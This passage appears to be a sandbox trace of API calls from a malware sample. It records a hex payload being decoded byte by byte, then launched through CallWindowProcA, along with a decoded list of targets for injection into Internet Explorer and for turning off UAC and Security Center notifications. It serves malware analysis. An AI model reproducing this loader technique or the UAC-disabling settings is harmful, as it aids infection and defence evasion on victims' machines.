psOut=0x18f69e) returned 0x0 [0194.649] GetUserDefaultLCID () returned 0x409 [0194.649] VarI2FromStr (in: strIn="&H8A", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.649] GetUserDefaultLCID () returned 0x409 [0194.649] VarI2FromStr (in: strIn="&H06", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.650] GetUserDefaultLCID () returned 0x409 [0194.650] VarI2FromStr (in: strIn="&H46", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.650] GetUserDefaultLCID () returned 0x409 [0194.650] VarI2FromStr (in: strIn="&H32", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.650] GetUserDefaultLCID () returned 0x409 [0194.650] VarI2FromStr (in: strIn="&H45", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.650] GetUserDefaultLCID () returned 0x409 [0194.650] VarI2FromStr (in: strIn="&HFB", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.650] GetUserDefaultLCID () returned 0x409 [0194.650] VarI2FromStr (in: strIn="&H56", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.651] GetUserDefaultLCID () returned 0x409 [0194.651] VarI2FromStr (in: strIn="&H50", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.651] GetUserDefaultLCID () returned 0x409 [0194.651] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.651] GetUserDefaultLCID () returned 0x409 [0194.651] VarI2FromStr (in: strIn="&H45", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.651] GetUserDefaultLCID () returned 0x409 [0194.651] VarI2FromStr (in: strIn="&HFC", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.651] GetUserDefaultLCID () returned 0x409 [0194.651] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.651] GetUserDefaultLCID () returned 0x409 [0194.651] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.652] GetUserDefaultLCID () returned 0x409 [0194.652] VarI2FromStr (in: strIn="&HFC", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.652] GetUserDefaultLCID () returned 0x409 [0194.652] VarI2FromStr (in: strIn="&H8A", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.652] GetUserDefaultLCID () returned 0x409 [0194.652] VarI2FromStr (in: strIn="&H06", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.652] GetUserDefaultLCID () returned 0x409 [0194.652] VarI2FromStr (in: strIn="&H46", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.652] GetUserDefaultLCID () returned 0x409 [0194.652] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.653] GetUserDefaultLCID () returned 0x409 [0194.653] VarI2FromStr (in: strIn="&H5D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.653] GetUserDefaultLCID () returned 0x409 [0194.653] VarI2FromStr (in: strIn="&HF4", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.653] GetUserDefaultLCID () returned 0x409 [0194.653] VarI2FromStr (in: strIn="&H39", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.653] GetUserDefaultLCID () returned 0x409 [0194.653] VarI2FromStr (in: strIn="&H5D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.653] GetUserDefaultLCID () returned 0x409 [0194.653] VarI2FromStr (in: strIn="&HFC", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.653] GetUserDefaultLCID () returned 0x409 [0194.653] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.654] GetUserDefaultLCID () returned 0x409 [0194.654] VarI2FromStr (in: strIn="&H0B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.654] GetUserDefaultLCID () returned 0x409 [0194.654] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.654] GetUserDefaultLCID () returned 0x409 [0194.654] VarI2FromStr (in: strIn="&H5D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.655] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.655] VarI2FromStr (in: strIn="&H89", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.655] VarI2FromStr (in: strIn="&H5D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.656] VarI2FromStr (in: strIn="&HFC", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.656] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.656] VarI2FromStr (in: strIn="&HF3", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.657] VarI2FromStr (in: strIn="&H8A", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.657] VarI2FromStr (in: strIn="&H06", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.657] VarI2FromStr (in: strIn="&H46", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.658] VarI2FromStr (in: strIn="&H88", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.658] VarI2FromStr (in: strIn="&H45", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.658] VarI2FromStr (in: strIn="&HFB", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.658] VarI2FromStr (in: strIn="&H58", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.659] VarI2FromStr (in: strIn="&H5E", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.659] VarI2FromStr (in: strIn="&H88", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.659] VarI2FromStr (in: strIn="&H07", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.660] VarI2FromStr (in: strIn="&H47", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.660] VarI2FromStr (in: strIn="&H49", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.660] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.661] VarI2FromStr (in: strIn="&HD1", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.661] VarI2FromStr (in: strIn="&H61", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.661] VarI2FromStr (in: strIn="&HC9", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.661] VarI2FromStr (in: strIn="&HC2", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.662] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.662] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.662] SafeArrayDestroyDescriptor (psa=0x5e3198) returned 0x0 [0194.662] GetUserDefaultLCID () returned 0x409 [0194.663] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f898, cchData=6 | out: lpLCData="1252") returned 5 [0194.663] SysStringLen (param_1="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x24 [0194.663] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0194.663] SysStringLen (param_1="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x24 [0194.663] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", cchWideChar=37, lpMultiByteStr=0x5e318c, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", lpUsedDefaultChar=0x0) returned 37 [0194.663] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.663] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0194.663] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.663] GetProcAddress (hModule=0x77820000, lpProcName="CallWindowProcA") returned 0x7784792f [0194.663] CallWindowProcA (lpPrevWndFunc=0x5deff0, hWnd=0x5e30c0, Msg=0xb9, wParam=0x5e318c, lParam=0x24) returned 0x5deff0 [0194.663] GetLastError () returned 0x578 [0194.663] GetUserDefaultLCID () returned 0x409 [0194.664] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f964, cchData=6 | out: lpLCData="1252") returned 5 [0194.664] SysStringByteLen (bstr="敫湲汥㈳湼摴汬慼癤灡㍩簲攮數楼硥汰牯籥剐䝏䅒䙍䱉卅屼湉整湲瑥䔠灸潬敲屲卼䕈䱌㈳ぼぼ卼䙏坔剁居楍牣獯景屴卼捥牵瑩⁹敃瑮牥啼䍁楄慳汢乥瑯晩籹楗摮睯屳畃牲湥噴牥楳湯停汯捩敩屳祓瑳浥䕼慮汢䱥䅕|") returned 0xb9 [0194.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5e2fcc, cbMultiByte=185, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 185 [0194.664] SysStringByteLen (bstr="敫湲汥㈳湼摴汬慼癤灡㍩簲攮數楼硥汰牯籥剐䝏䅒䙍䱉卅屼湉整湲瑥䔠灸潬敲屲卼䕈䱌㈳ぼぼ卼䙏坔剁居楍牣獯景屴卼捥牵瑩⁹敃瑮牥啼䍁楄慳汢乥瑯晩籹楗摮睯屳畃牲湥噴牥楳湯停汯捩敩屳祓瑳浥䕼慮汢䱥䅕|") returned 0xb9 [0194.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5e2fcc, cbMultiByte=186, lpWideCharStr=0x5e2e44, cchWideChar=371 | out: lpWideCharStr="kernel32|ntdll|advapi32|.exe|iexplore|PROGRAMFILES|\\Internet Explorer\\|SHELL32|0|0|SOFTWARE\\Microsoft\\|Security Center|UACDisableNotify|Windows\\CurrentVersion\\Policies\\System|EnableLUA|") returned 186 [0194.667] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0194.667] SafeArrayAllocDescriptorEx (in: vt=0x8, cDims=0x1, ppsaOut=0x18f6cc | out: ppsaOut=0x18f6cc) returned 0x0 [0194.667] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0194.667] IMalloc:Alloc (This=0x75e366bc, cb=0x44) returned 0x5e3c50 [0194.667] IMalloc:GetSize (This=0x75e366bc, pv=0x5e3c50) returned 0x44 [0194.667] GetUserDefaultLCID () returned 0x409 [0194.667] VarI2FromStr (in: strIn="&HE8", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.668] GetUserDefaultLCID () returned 0x409 [0194.668] VarI2FromStr (in: strIn="&H22", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.668] GetUserDefaultLCID () returned 0x409 [0194.668] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.668] GetUserDefaultLCID () returned 0x409 [0194.668] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.668] GetUserDefaultLCID () returned 0x409 [0194.668] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.668] GetUserDefaultLCID () returned 0x409 [0194.668] VarI2FromStr (in: strIn="&H68", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.669] GetUserDefaultLCID () returned 0x409 [0194.669] VarI2FromStr (in: strIn="&HA4", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.669] GetUserDefaultLCID () returned 0x409 [0194.669] VarI2FromStr (in: strIn="&H4E", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.669] GetUserDefaultLCID () returned 0x409 [0194.669] VarI2FromStr (in: strIn="&H0E", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.669] GetUserDefaultLCID () returned 0x409 [0194.669] VarI2FromStr (in: strIn="&HEC", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.669] GetUserDefaultLCID () returned 0x409 [0194.669] VarI2FromStr (in: strIn="&H50", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.669] GetUserDefaultLCID () returned 0x409 [0194.670] VarI2FromStr (in: strIn="&HE8", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.670] GetUserDefaultLCID () returned 0x409 [0194.670] VarI2FromStr (in: strIn="&H43", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.670] GetUserDefaultLCID () returned 0x409 [0194.670] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.670] GetUserDefaultLCID () returned 0x409 [0194.670] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.670] GetUserDefaultLCID () returned 0x409 [0194.670] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.670] GetUserDefaultLCID () returned 0x409 [0194.670] VarI2FromStr (in: strIn="&H83", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.671] GetUserDefaultLCID () returned 0x409 [0194.671] VarI2FromStr (in: strIn="&HC4", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.671] GetUserDefaultLCID () returned 0x409 [0194.671] VarI2FromStr (in: strIn="&H08", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.671] GetUserDefaultLCID () returned 0x409 [0194.671] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.671] GetUserDefaultLCID () returned 0x409 [0194.671] VarI2FromStr (in: strIn="&H74", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.671] GetUserDefaultLCID () returned 0x409 [0194.671] VarI2FromStr (in: strIn="&H24", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.672] GetUserDefaultLCID () returned 0x409 [0194.672] VarI2FromStr (in: strIn="&H04", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.672] GetUserDefaultLCID () returned 0x409 [0194.672] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.672] GetUserDefaultLCID () returned 0x409 [0194.672] VarI2FromStr (in: strIn="&HD0", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.672] GetUserDefaultLCID () returned 0x409 [0194.672] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.672] GetUserDefaultLCID () returned 0x409 [0194.672] VarI2FromStr (in: strIn="&H74", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.672] GetUserDefaultLCID () returned 0x409 [0194.672] VarI2FromStr (in: strIn="&H24", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.673] GetUserDefaultLCID () returned 0x409 [0194.673] VarI2FromStr (in: strIn="&H08", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.673] GetUserDefaultLCID () returned 0x409 [0194.673] VarI2FromStr (in: strIn="&H50", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.748] GetUserDefaultLCID () returned 0x409 [0194.748] VarI2FromStr (in: strIn="&HE8", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.757] GetUserDefaultLCID () returned 0x409 [0194.757] VarI2FromStr (in: strIn="&H30", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.758] GetUserDefaultLCID () returned 0x409 [0194.758] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.758] GetUserDefaultLCID () returned 0x409 [0194.758] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.758] GetUserDefaultLCID () returned 0x409 [0194.758] VarI2FromStr (in: strIn="&H00", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.758] GetUserDefaultLCID () returned 0x409 [0194.758] VarI2FromStr (in: strIn="&H83", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.758] GetUserDefaultLCID () returned 0x409 [0194.758] VarI2FromStr (in: strIn="&HC4", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.759] GetUserDefaultLCID () returned 0x409 [0194.759] VarI2FromStr (in: strIn="&H08", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.767] GetUserDefaultLCID () returned 0x409 [0194.767] VarI2FromStr (in: strIn="&HC3", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.777] GetUserDefaultLCID () returned 0x409 [0194.777] VarI2FromStr (in: strIn="&H56", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.778] GetUserDefaultLCID () returned 0x409 [0194.778] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.778] GetUserDefaultLCID () returned 0x409 [0194.778] VarI2FromStr (in: strIn="&H31", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.778] GetUserDefaultLCID () returned 0x409 [0194.778] VarI2FromStr (in: strIn="&HC0", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.778] GetUserDefaultLCID () returned 0x409 [0194.778] VarI2FromStr (in: strIn="&H64", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.778] GetUserDefaultLCID () returned 0x409 [0194.778] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.778] GetUserDefaultLCID () returned 0x409 [0194.779] VarI2FromStr (in: strIn="&H70", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.779] GetUserDefaultLCID () returned 0x409 [0194.779] VarI2FromStr (in: strIn="&H30", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.779] GetUserDefaultLCID () returned 0x409 [0194.779] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.779] GetUserDefaultLCID () returned 0x409 [0194.779] VarI2FromStr (in: strIn="&H76", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.779] GetUserDefaultLCID () returned 0x409 [0194.779] VarI2FromStr (in: strIn="&H0C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.779] GetUserDefaultLCID () returned 0x409 [0194.779] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.780] GetUserDefaultLCID () returned 0x409 [0194.780] VarI2FromStr (in: strIn="&H76", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.780] GetUserDefaultLCID () returned 0x409 [0194.780] VarI2FromStr (in: strIn="&H1C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.780] GetUserDefaultLCID () returned 0x409 [0194.780] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.780] GetUserDefaultLCID () returned 0x409 [0194.780] VarI2FromStr (in: strIn="&H6E", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.780] GetUserDefaultLCID () returned 0x409 [0194.780] VarI2FromStr (in: strIn="&H08", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.781] GetUserDefaultLCID () returned 0x409 [0194.781] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.781] GetUserDefaultLCID () returned 0x409 [0194.781] VarI2FromStr (in: strIn="&H7E", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.781] GetUserDefaultLCID () returned 0x409 [0194.781] VarI2FromStr (in: strIn="&H20", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.781] GetUserDefaultLCID () returned 0x409 [0194.781] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.781] GetUserDefaultLCID () returned 0x409 [0194.781] VarI2FromStr (in: strIn="&H36", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.782] GetUserDefaultLCID () returned 0x409 [0194.782] VarI2FromStr (in: strIn="&H38", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.782] GetUserDefaultLCID () returned 0x409 [0194.782] VarI2FromStr (in: strIn="&H47", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.783] VarI2FromStr (in: strIn="&H18", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.783] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.783] VarI2FromStr (in: strIn="&HF3", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.784] VarI2FromStr (in: strIn="&H80", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.784] VarI2FromStr (in: strIn="&H3F", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.784] VarI2FromStr (in: strIn="&H6B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.784] VarI2FromStr (in: strIn="&H74", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.785] VarI2FromStr (in: strIn="&H07", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.785] VarI2FromStr (in: strIn="&H80", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.785] VarI2FromStr (in: strIn="&H3F", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.786] VarI2FromStr (in: strIn="&H4B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.786] VarI2FromStr (in: strIn="&H74", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.786] VarI2FromStr (in: strIn="&H02", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.787] VarI2FromStr (in: strIn="&HEB", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.787] VarI2FromStr (in: strIn="&HE7", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.787] VarI2FromStr (in: strIn="&H89", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.787] VarI2FromStr (in: strIn="&HE8", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.788] VarI2FromStr (in: strIn="&H5D", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.788] VarI2FromStr (in: strIn="&H5E", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.788] VarI2FromStr (in: strIn="&HC3", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.789] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.789] VarI2FromStr (in: strIn="&H52", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.789] VarI2FromStr (in: strIn="&H51", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.790] VarI2FromStr (in: strIn="&H53", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.790] VarI2FromStr (in: strIn="&H56", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.790] VarI2FromStr (in: strIn="&H57", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.790] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.791] VarI2FromStr (in: strIn="&H6C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.791] VarI2FromStr (in: strIn="&H24", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.791] 